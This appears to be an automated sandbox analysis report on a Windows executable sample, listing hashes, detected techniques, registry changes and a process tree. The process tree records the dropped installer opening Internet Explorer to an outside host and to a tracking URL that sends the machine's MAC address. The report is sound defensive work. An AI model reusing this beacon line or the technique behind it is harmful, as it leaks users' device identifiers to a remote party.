Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05/10/2024, 05:11
Static task
static1
Behavioral task
behavioral1
Sample
164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe
-
Size
159KB
-
MD5
164a91f2021d5a0f0df19e560468fab9
-
SHA1
97157d2de5f371da509389dd93afa024e31a21eb
-
SHA256
e8791bb4a0ac201d0810a8fcd91903c8887930e8542953336a147b637e344ed8
-
SHA512
8d36ed5d0018cf3613780cf01500b1de5e9373ed37d9c3f515c43201212653f74fd5c189ab0b56f9e29439ee2603d15aca60950c1f0b71cfbdc36d6899b05d12
-
SSDEEP
3072:vhT2137DYmJmw7DE1wy5itHx5xcezcTy2IwFf2mlkL7hQpXnYqzuA6FkepT:vhRjK6vY5P18y3wdlm705epT
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation 164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe -
Executes dropped EXE 2 IoCs
pid Process 4760 setup.exe 3844 net_setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net_setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "441206380" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31135461" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31135461" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31135461" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{45E9E10F-82D8-11EF-BB4F-66FD5BE5AD11} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "443549984" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "441206380" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f1000000000200000000001066000000010000200000002af70e71d795531cf2388cf2a6931ec79cebe4a02416e1e48b6cc60586ebea13000000000e8000000002000020000000a7533dc275ab7378bdb84ce9792fce4ff3df878d98612590ef179ab835bd256f200000009a3bb8eef6de9876b5b98360fc8da81ad9276db3f49e2c46b0dfae5ad888123b4000000045834d0bcb19625e050dd4f653836ab4bdcad25ac345e6d8acdb6e8577a7f0f03010a740c69d41f584b2b6c45d878038b3dad7cb04eca969f9a102fc40e4e5e0 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f100000000020000000000106600000001000020000000b1f4452e08ec2fae38ec19ac2d6d5694e2ed815e22fe4088a7b6fc8e181fd959000000000e80000000020000200000000d334226fe897a1655a47e832f8d2713c61386e2e15bd39ea1e52eedcb44499e2000000070139d6549750d61c71e876c5dcc869de9f765e37c7ed2419b9b8c4e8e1f80b2400000002be315d095beef3e68e25ba99967a8d52b811014933ec67fa1e378e028791187d363e1631554f1f9f1358f0ffcb667858e4fca6386649abbe5cdd90ced7a455a IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434870061" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b04f2c23e516db01 IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a07b3323e516db01 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3352 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4760 setup.exe 3352 IEXPLORE.EXE 3352 IEXPLORE.EXE 3716 IEXPLORE.EXE 3716 IEXPLORE.EXE 3716 IEXPLORE.EXE 3716 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 3680 wrote to memory of 4760 3680 164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe 81 PID 3680 wrote to memory of 4760 3680 164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe 81 PID 3680 wrote to memory of 4760 3680 164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe 81 PID 3680 wrote to memory of 3844 3680 164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe 82 PID 3680 wrote to memory of 3844 3680 164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe 82 PID 3680 wrote to memory of 3844 3680 164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe 82 PID 4760 wrote to memory of 3352 4760 setup.exe 83 PID 4760 wrote to memory of 3352 4760 setup.exe 83 PID 3352 wrote to memory of 3716 3352 IEXPLORE.EXE 84 PID 3352 wrote to memory of 3716 3352 IEXPLORE.EXE 84 PID 3352 wrote to memory of 3716 3352 IEXPLORE.EXE 84 PID 4760 wrote to memory of 4948 4760 setup.exe 86 PID 4760 wrote to memory of 4948 4760 setup.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\164a91f2021d5a0f0df19e560468fab9_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\setup.exe"C:\setup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.ok177.com/mini.html3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3352 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3716
-
-
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.ok177.com/tongji/g.asp?mac=66:FD:5B:E5:AD:11&id=admin23⤵
- Modifies Internet Explorer settings
PID:4948
-
-
-
C:\net_setup.exe"C:\net_setup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3844
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD5db7c83e09ebc4317f2bf2df7f66b8513
SHA129d58ef43f72ce7cf79ce6109d038a6c9b4873f0
SHA2561ae4c8aa37bf433bc5b3b45e017c95bf843c7dbbe348c78c7ab6f3cad0fda4b8
SHA5126eb46ae0c3e091ba13b1c0e3fb6de568882940df7968d0e1297568ea5356a4691f2a869c7c9ac9e9642bcc2e4e1388d00b15c663276143e8cb5015ab89c27867
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD5a49e7547d53767ee9065d5024381af26
SHA174f2db42cad9aa07320768292294271b8009ce42
SHA256123590b618f80ca28f354e921b0f1be100d4f168d0b0812f360732a9b133b09d
SHA51206d7f11a37c111e65e20012ff0ae629a55b8b3b3931e093c530ec44efff93021fc4aee3706ccad96895c21930b06cfd97fb6909716f8e04588f7fbb65647434e
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
320KB
MD53bcee5c81e47f8bd3ac58d4e498012c3
SHA1d1b3f136fe521d9ef2beeba789b19f9659ebd8fe
SHA256e90d9f41cb2ebb43b0a103d0255f1f2f7dbe5c7d646df1ff5b679bca373775fe
SHA5128651609b13a835030efacfd639844038dd250cb893842e97b38c786c2ede5ef155a8217f32f162d6c28a33425c0d04c95d7da1ad8c04c35a84158a997b9efea8
-
Filesize
32KB
MD53ca2450fc36d7c1012e162c237326ca8
SHA1705bd411569881666b931a39a13f07a27990b0fc
SHA2569ac182116ec907469042cf11059afc77e2c3f3fb2ad5956e1008cfb73adcaf72
SHA512f17f47321206ceee4b13239872db9da7754db21a35b2e0a24816e204946d5f45404df6bbce980266c8ccb04de5f3100611a7bbfda82f4679768f102ed7fcb7e7